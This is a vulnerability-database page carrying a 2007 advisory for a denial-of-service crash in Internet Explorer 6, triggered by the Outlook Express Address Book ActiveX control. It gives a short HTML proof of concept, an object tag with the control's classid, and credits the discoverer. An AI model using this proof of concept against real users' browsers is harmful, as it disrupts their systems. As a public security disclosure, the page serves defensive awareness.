Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17225
HistoryJun 11, 2007 - 12:00 a.m.

IE 6 / MS Office Outlook Express Address Book Activex DoS

2007-06-1100:00:00
vulners.com
11
JSON

IE 6 / MS Office Outlook Express Address Book Activex DoS
Affected Software : MS Internet Explorer 6.x

Overview:

when a browser use MS outlook Express Address book ActiveX , crash the browser immediately.
An attacker can exploit this issue to trigger denial-of-service conditions in Internet Explorer version 6(.x) .

PoC (HTML)

<!–
[~] Microsoft Office Outlook Express Address Book DoS
[~] Tested on windows XP sp2 , IE 6
[~] Simorgh Security Team / www.simorgh-ev.org
[!] Hessam-x / www.Hessamx.net
–>
<HTML>
<object classid='clsid:233A9694-667E-11d1-9DFB-006097D50408' id='outlook' /></object>
<center> Microsoft Office Outlook Express Address Book DoS</center>
<center>Hessamx</center>
</HTML>

Credit

Discovered By Hessam Salehi (Hessamx)
Simorgh Security Team / www.simorgh-ev.org

JSON